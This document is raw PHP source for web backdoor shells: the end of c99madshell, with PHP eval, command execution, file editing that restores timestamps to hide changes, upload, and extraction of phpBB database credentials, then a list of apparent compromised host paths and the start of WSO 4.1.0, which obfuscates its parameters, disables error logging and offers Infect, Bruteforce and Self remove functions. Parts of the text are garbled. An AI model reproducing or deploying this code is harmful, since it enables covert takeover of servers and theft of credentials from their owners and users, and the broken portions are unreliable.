convert_cyr_string($ret,"d","w"); $stack = explode("\n",$ret); unset($stack[0],$stack[2]); $stack = array_values($stack); $head = explode(" ",$stack[0]); $head[1] = explode(" ",$head[1]); $head[1] = $head[1][0]; $stack = array_slice($stack,1); unset($head[2]); $head = array_values($head); if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";} else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";} if ($k > count($head)) {$k = count($head)-1;} for($i=0;$i<count($head);$i++) { if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."a\"';document.todo.submit();\"><b>".trim($head[$i])."</b></a>";} } $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo "<tr>"; $line = explode(" ",$line); $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); $line[2] = intval(str_replace(" ","",$line[2]))*1024; $prcs[] = $line; echo "</tr>"; } } } $head[$k] = "<b>".$head[$k]."</b>".$y; $v = $processes_sort[0]; usort($prcs,"tabsort"); if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} $tab = array(); $tab[] = $head; $tab = array_merge($tab,$prcs); echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; foreach($tab as $i=>$k) { echo "<tr>"; foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} echo "</tr>"; } echo "</table>"; } } if ($act == "eval") { if (!empty($eval)) { echo "<b>Result of execution this PHP-code</b>:<br>"; $tmp = ob_get_contents(); $olddir = realpath("."); @chdir($d); if ($tmp) { ob_clean(); eval($eval); $ret = ob_get_contents(); $ret = convert_cyr_string($ret,"d","w"); ob_clean(); echo $tmp; if ($eval_txt) { $rows = count(explode("\r\n",$ret))+1; if ($rows < 10) {$rows = 10;} echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; } else {echo $ret."<br>";} } else { if ($eval_txt) { echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; eval($eval); echo "</textarea>"; } else {echo $ret;} } @chdir($olddir); } else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} echo "<form method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; } if ($act == "f") { if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='edit';document.todo.c.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><u>Create</u></a></center>";} } else { $r = @file_get_contents($d.$f); $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} if (empty($ft)) {$ft = $rft;} $arr = array( array("DIZ","info"), array("HTML","html"), array("TXT","txt"), array("Code","code"), array("Session","phpsess"), array("EXE","exe"), array("SDB","sdb"), array("INI","ini"), array("DOWNLOAD","download"), array("RTF","notepad"), array("EDIT","edit") ); echo "<b>Viewing file: ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; foreach($arr as $t) { if ($t[1] == $rft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><font color=green>".$t[0]."</font></a>";} elseif ($t[1] == $ft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b><u>".$t[0]."</u></b></a>";} else {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".$t[0]."</b></a>";} echo " |"; } echo "<hr size=\"1\" noshade>"; if ($ft == "info") { echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; if (!$win) { echo "<tr><td><b>Owner/Group</b></td><td> "; $ow = posix_getpwuid(fileowner($d.$f)); $gr = posix_getgrgid(filegroup($d.$f)); echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); } echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='".urlencode($f)."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; $fi = fopen($d.$f,"rb"); if ($fi) { if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} $n = 0; $a0 = "00000000<br>"; $a1 = ""; $a2 = ""; for ($i=0; $i<strlen($str); $i++) { $a1 .= sprintf("%02X",ord($str[$i]))." "; switch (ord($str[$i])) { case 0: $a2 .= "<font>0</font>"; break; case 32: case 10: case 13: $a2 .= " "; break; default: $a2 .= htmlspecialchars($str[$i]); } $n++; if ($n == $hexdump_rows) { $n = 0; if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} $a1 .= "<br>"; $a2 .= "<br>"; } } //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; } $encoded = ""; if ($base64 == 1) { echo "<b>Base64 Encode</b><br>"; $encoded = base64_encode(file_get_contents($d.$f)); } elseif($base64 == 2) { echo "<b>Base64 Encode + Chunk</b><br>"; $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); } elseif($base64 == 3) { echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; $encoded = base64_encode(file_get_contents($d.$f)); $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); } elseif($base64 == 4) { $text = file_get_contents($d.$f); $encoded = base64_decode($text); echo "<b>Base64 Decode"; if (base64_encode($encoded) != $text) {echo " (failed)";} echo "</b><br>"; } if (!empty($encoded)) { echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; } echo "<b>HEXDUMP:</b><nobr> [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.fullhexdump.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Full</a>] [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Preview</a>]<br><b>Base64: </b> <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Encode</a>] </nobr> <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='2';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk</a>] </nobr> <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='3';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk+quotes</a>] </nobr> <nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='4';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Decode</a>] </nobr> <P>"; } elseif ($ft == "html") { if ($white) {@ob_clean();} echo $r; if ($white) {c99shexit();} } elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} elseif ($ft == "phpsess") { echo "<pre>"; $v = explode("|",$r); echo $v[0]."<br>"; var_dump(unserialize($v[1])); echo "</pre>"; } elseif ($ft == "exe") { $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach($exeftypes as $k=>$v) { if (in_array($ext,$v)) {$rft = $k; break;} } $cmd = str_replace("%f%",$f,$rft); echo "<b>Execute file:</b><form method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; } elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} elseif ($ft == "code") { if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) { $arr = explode("\n",$r); if (count($arr == 18)) { include($d.$f); echo "<b>phpBB configuration is detected in this file!<br>"; if ($dbms == "mysql4") {$dbms = "mysql";} if ($dbms == "mysql") {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($dbuser)."';document.sql.sql_passwd.value='".htmlspecialchars($dbpasswd)."';document.sql.sql_server.value='".htmlspecialchars($dbhost)."';document.sql.sql_port.value='3306';document.sql.sql_db.value='".htmlspecialchars($dbname)."';document.sql.submit();\"><b><u>Connect to DB</u></b></a><br><br>";} else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99madshell. Please, report us for fix.";} echo "Parameters for manual connect:<br>"; $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} echo "</b><hr size=\"1\" noshade>"; } } echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; if (!empty($white)) {@ob_clean();} highlight_file($d.$f); if (!empty($white)) {c99shexit();} echo "</div>"; } elseif ($ft == "download") { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".filesize($d.$f)); header("Content-disposition: attachment; filename=\"".$f."\";"); echo $r; exit; } elseif ($ft == "notepad") { @ob_clean(); header("Content-type: text/plain"); header("Content-disposition: attachment; filename=\"".$f.".txt\";"); echo($r); exit; } elseif ($ft == "edit") { if (!empty($submit)) { if ($filestealth) {$stat = stat($d.$f);} $fp = fopen($d.$f,"w"); if (!$fp) {echo "<b>Can't write to file!</b>";} else { echo "<b>Saved!</b>"; fwrite($fp,$edit_text); fclose($fp); if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} $r = $edit_text; } } $rows = count(explode("\r\n",$r)); if ($rows < 10) {$rows = 10;} if ($rows > 30) {$rows = 30;} echo "<form method=\"POST\"><input name='act' type='hidden' value='f'><input name='f' type='hidden' value='".urlencode($f)."'><input name='ft' type='hidden' value='edit'><input name='d' type='hidden' value='".urlencode($d)."'><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; } elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} } } if ($act == "about") {echo "<center><b>Webbased shell for administration your resources<br>Credits:<br>Start coding by CCTeaM.<br><font color=green>Edited and Finished by <b>MADNET</b><br>ICQ 751777 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=751777\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=751777&img=5\" border=0 align=absmiddle></font></a>.</b>";} ?> </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="#" onclick="document.todo.act.value='cmd';document.todo.d.value='<?php echo urlencode($d); ?>';document.todo.submit();"><b>Command execute</b></a> ::</b></p></td></tr> <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE> <br> <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr> <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='search';document.todo.submit();"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td> <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='upload';document.todo.submit();"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"> <input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> </tr> </table> <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td></tr></table> <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. <?php echo $shver; ?><a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a>| <a href="http://securityprobe.net"><font color="#FF0000">http://securityprobe.net</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> </body></html><?php chdir($lastdir); c99shexit(); ?>
login-93.hoststar.ch
/home/www/confixx/html/reseller/index3.php
login-95.hoststar.ch
/home/www/confixx/html/reseller/index3.php
login-96.hoststar.ch
/home/www/confixx/html/reseller/index3.php
<?php //-----------------Password--------------------- $â297a57a5a743894a0e4a801fc3"; //admin $â = "#fff"; $â = true; $â = 'UTF-8'; $â = 'FilesMan'; $â = md5($_SERVER['HTTP_USER_AGENT']); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { prototype(md5($_SERVER['HTTP_HOST'])."key", $â); } if(empty($_POST['charset'])) $_POST['charset'] = $â; if (!isset($_POST['ne'])) { if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); } function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '4.1.0'); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } if(!empty($â if(isset($_POST['pass']) && (md5($_POST['pass']) == $â rototype(md5($_SERVER['HTTP_HOST']), $â f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â ardLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; function hardHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['â']; global $â; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title> <style> body {background-color:#060a10;color:#e1e1e1;} body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} table.info {color:#C3C3C3;background-color:#060a10;} span,h1,a {color:$â !important;} span {font-weight:bolder;} h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;} div.content {padding:5px;margin-left:5px;background-color:#060a10;} a {text-decoration:none;} a:hover {text-decoration:underline;} .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;} .bigarea {width:100%;height:250px; } input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;} form {margin:0px;} #toolsTbl {text-align:center;} .toolsInp {width:300px} .main th {text-align:left;background-color:#060a10;} .main tr:hover{background-color:#354252;} .main td, th{vertical-align:middle;} .l1 {background-color:#1e252e;} pre {font:9pt Courier New;} </style> <script> var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) ."' var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; var d = document; function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);} function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;} function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;} function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $â) $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['â)) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'. '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . 